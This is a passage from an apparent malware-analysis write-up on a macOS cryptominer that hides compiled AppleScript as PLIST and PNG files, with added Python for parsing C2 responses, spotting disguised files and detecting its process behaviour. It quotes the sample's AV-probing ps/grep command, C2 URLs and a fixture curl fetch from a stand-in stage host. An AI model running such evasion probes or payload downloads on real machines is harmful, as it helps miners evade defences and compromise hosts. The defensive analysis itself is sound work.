

The Network Tab shows multiple C2 connections. The first request, to budaybu100001com:8080, returns the second-stage URL delimited by the marker string “-=-=-=”.

Interestingly, two URLs are returned. The second one might be a fallback or might be used by another variant of the family. The second stage is another compiled AppleScript, stored at ~/Library/11.png. It is again executed using “osascript” and has two main tasks: download and extract the third-stage mining payload, and write the mining configuration (pools.txt, config.txt, cpu.txt). All downloads are performed using curl, which is clearly visible in the Behavior Tab.
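The marker-delimited response described above is simple to parse, and an analyst writing a C2 emulator or a report script will want to pull out both URLs and treat the second as the fallback. The following is an added example, not code from the sample or from VMRay: it assumes the response body carries each URL between two “-=-=-=” markers (the exact layout is an assumption), the hostnames are constructed, and the primary/fallback split is an interpretation the page only suggests.

```python
import re

# Marker the page describes in the first C2 response; the surrounding layout
# of the response body is an assumption made for this example.
MARKER = "-=-=-="

# Accept only bare http(s) URLs so HTML or padding around the markers is ignored.
URL_RE = re.compile(r"^https?://[^\s\"'<>]+$")


def extract_stage_urls(body: str, marker: str = MARKER) -> list[str]:
    """Return every URL found between marker strings, in order of appearance.

    A body without the marker yields an empty list rather than an exception,
    so a dead or sinkholed C2 does not crash the caller.
    """
    if marker not in body:
        return []
    urls = []
    for chunk in body.split(marker):
        candidate = chunk.strip()
        if URL_RE.match(candidate):
            urls.append(candidate)
    return urls


def defang(url: str) -> str:
    """Defang a URL for reporting (http -> hxxp, '.' -> '[.]')."""
    scheme, sep, rest = url.partition("://")
    return scheme.replace("http", "hxxp") + sep + rest.replace(".", "[.]")


def triage(body: str) -> dict:
    """Split extracted URLs into primary and fallback (first URL = primary,
    later URLs = fallbacks; this ordering is an assumption)."""
    urls = extract_stage_urls(body)
    return {
        "primary": defang(urls[0]) if urls else None,
        "fallback": [defang(u) for u in urls[1:]],
    }


# Constructed C2 response for this example; the hostnames are not the real ones.
SAMPLE_RESPONSE = (
    "<html><body>ok</body></html>\n"
    "-=-=-=http://stage-a.invalid:8080/11.png"
    "-=-=-=http://stage-b.invalid:8080/11.png-=-=-=\n"
)


if __name__ == "__main__":
    print(triage(SAMPLE_RESPONSE))
```

Running it against the constructed response yields the first URL as primary and the second as the single fallback, both defanged for a report; an empty or marker-less body yields no primary.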
The third stage is a zip file containing two dynamic libraries (dylibs) and, finally, a Mach-O binary, again disguised as a PLIST, which can be clearly seen in the Files Tab. In addition, the second stage uses the system tool “caffeinate” to prevent the machine from going to sleep, while the first stage continuously queries the running processes for common AV programs using the ps command:

sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk ''

All of these actions are performed using sub-processes, so they can be observed in the process graph and process overview.

As we can see, this sample uses a different kind of evasion: a rather uncommon file type, a compiled AppleScript, disguised as a PLIST file. This file type has no problem running on a victim’s machine, but it is difficult for security teams to analyze because of the inherent obfuscation and the limited tooling available. Running the sample in VMRay gives analysts an immediate view into the key behaviors, characteristics, and IOCs.
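The disguise this sample relies on, a compiled AppleScript or Mach-O binary named as a .plist or .png, falls apart as soon as the file's leading bytes are compared with what its extension claims. The following is an added example, not code from the sample or from VMRay's product: it checks a file's magic bytes (compiled AppleScript files, run-only ones included, begin with “FasdUAS”; plists begin with “bplist00” or an XML prolog; Mach-O and zip headers are the standard ones) against the extension and reports mismatches. The sample file contents and names below are constructed for the example.

```python
from pathlib import Path

# Compiled AppleScript (.scpt, run-only scripts included) starts with this magic.
COMPILED_APPLESCRIPT_MAGIC = b"FasdUAS"
# Binary and XML property lists.
PLIST_MAGICS = (b"bplist00", b"<?xml", b"<plist")
# Mach-O thin (32/64-bit, either byte order) and fat headers.
MACHO_MAGICS = {
    bytes.fromhex("feedface"), bytes.fromhex("cefaedfe"),
    bytes.fromhex("feedfacf"), bytes.fromhex("cffaedfe"),
    bytes.fromhex("cafebabe"),
}
ZIP_MAGIC = b"PK\x03\x04"
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"

# What a given extension is expected to contain; only extensions the sample
# abuses (.plist, .png) are covered here.
EXPECTED_BY_EXT = {".plist": "plist", ".png": "png"}


def classify(header: bytes) -> str:
    """Identify a file by its leading bytes, ignoring what the extension claims."""
    head = header.lstrip()  # XML plists may start with whitespace
    if head.startswith(COMPILED_APPLESCRIPT_MAGIC):
        return "compiled-applescript"
    if any(head.startswith(m) for m in PLIST_MAGICS):
        return "plist"
    if header[:4] in MACHO_MAGICS:
        return "mach-o"
    if header.startswith(ZIP_MAGIC):
        return "zip"
    if header.startswith(PNG_MAGIC):
        return "png"
    return "unknown"


def extension_mismatch(name: str, header: bytes):
    """Return a finding string when the extension and the content disagree,
    None when they agree or the extension is not covered by this check."""
    expected = EXPECTED_BY_EXT.get(Path(name).suffix.lower())
    if expected is None:
        return None
    kind = classify(header)
    if kind == expected:
        return None
    return f"{name}: extension claims {expected}, content is {kind}"


def scan(paths) -> list[str]:
    """Read the first 16 bytes of each path on disk and collect mismatches."""
    findings = []
    for p in map(Path, paths):
        try:
            with p.open("rb") as fh:
                header = fh.read(16)
        except OSError:
            continue
        finding = extension_mismatch(p.name, header)
        if finding:
            findings.append(finding)
    return findings


# Constructed in-memory samples (names and bytes invented for this example).
SAMPLES = {
    "com.apple.4V.plist": b"FasdUAS 1.101.10\x0e",        # compiled AppleScript as .plist
    "11.png": b"FasdUAS 1.101.10\x0e",                    # compiled AppleScript as .png
    "Info.plist": b'<?xml version="1.0" encoding="UTF-8"?>',  # genuine XML plist
    "prefs.plist": b"bplist00" + b"\x00" * 8,             # genuine binary plist
    "photo.png": PNG_MAGIC + b"\x00\x00\x00\rIHDR",       # genuine PNG
    "libfoo.dylib": bytes.fromhex("cffaedfe07000001"),    # Mach-O, extension not checked
}


def check_samples() -> list[str]:
    return [f for name, header in SAMPLES.items()
            if (f := extension_mismatch(name, header))]


if __name__ == "__main__":
    for line in check_samples():
        print(line)
```

Point scan() at ~/Library and a launch-agent directory on a suspect host and every "plist" that is really a compiled script or a Mach-O shows up; the check is cheap enough to run across a fleet and needs no AppleScript tooling at all.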
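Because every one of these actions runs as a sub-process, the same behaviours that show up in the process graph can be turned into detection logic over process-creation telemetry: osascript executing a file with a non-script extension, a ps-into-grep pipeline listing several AV product names, and caffeinate spawned from a script interpreter. The following is an added example, not VMRay's detection logic or the sample's code: the event structure, PIDs, paths and the benign control events are constructed, and the rule thresholds (two or more AV names) are assumptions.

```python
import re
from dataclasses import dataclass

# Product names the sample greps for (taken from the command line shown above).
AV_KEYWORDS = ("360", "Keeper", "MacMgr", "Lemon", "Malware", "Avast", "Avira", "CleanMyMac")
# Extensions that should never be handed to osascript as a script file.
NON_SCRIPT_EXTS = (".plist", ".png", ".jpg", ".txt")


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable name, e.g. "sh" or "osascript"
    cmdline: str    # full command line as logged


def av_process_probe(ev: ProcEvent) -> bool:
    """ps piped into grep naming two or more AV products: the sample's AV check."""
    if not re.search(r"\bps\b.*\|\s*grep", ev.cmdline):
        return False
    hits = sum(1 for k in AV_KEYWORDS if k in ev.cmdline)
    return hits >= 2   # threshold is an assumption; one name alone is common in admin scripts


def osascript_non_script_file(ev: ProcEvent) -> bool:
    """osascript executing a file whose extension disguises it (plist, png, ...)."""
    if ev.image != "osascript":
        return False
    return any(arg.lower().endswith(NON_SCRIPT_EXTS) for arg in ev.cmdline.split()[1:])


def caffeinate_from_osascript(ev: ProcEvent, by_pid: dict) -> bool:
    """caffeinate whose parent is osascript: keeps the host awake for the miner."""
    if ev.image != "caffeinate":
        return False
    parent = by_pid.get(ev.ppid)
    return parent is not None and parent.image == "osascript"


def detect(events) -> list[tuple[str, int]]:
    """Run every rule over the events and return (rule, pid) findings in order."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        if osascript_non_script_file(ev):
            findings.append(("osascript_non_script_file", ev.pid))
        if av_process_probe(ev):
            findings.append(("av_process_probe", ev.pid))
        if caffeinate_from_osascript(ev, by_pid):
            findings.append(("caffeinate_from_osascript", ev.pid))
    return findings


# Constructed process events; PIDs, paths and hostnames are invented for this example.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "launchd", "/sbin/launchd"),
    ProcEvent(201, 100, "osascript", "osascript /Users/victim/Library/com.apple.4V.plist"),
    ProcEvent(202, 201, "sh", "sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk ''"),
    ProcEvent(203, 201, "osascript", "osascript /Users/victim/Library/11.png"),
    ProcEvent(204, 203, "caffeinate", "caffeinate -i"),
    ProcEvent(205, 203, "curl", "curl -s -o /Users/victim/Library/11.png http://stage-a.invalid:8080/11.png"),
    ProcEvent(300, 100, "sh", "sh -c ps ax | grep Finder | grep -v grep"),   # benign admin check
    ProcEvent(301, 100, "caffeinate", "caffeinate -d"),                       # user-launched, not from a script
]


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

The two benign control events (a single-name ps|grep and a user-launched caffeinate) produce no findings, which is the point of tying the caffeinate rule to its parent and the AV probe to a count of product names rather than to the presence of grep alone.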
Within 2 minutes of analysis time, analysts can see the majority of the sample’s behavior, compared to hours of manual reverse engineering. And for deeper analysis, the second and third stages are visible and available from the VMRay Analyzer Report.

IOCs:
com.apple.4V.plist df550039acad9e637c7c3ec2a629abf8b3f35faca18e58d447f490cf23f114e8
Hxxp://ondayoncom:8080/ondayon.

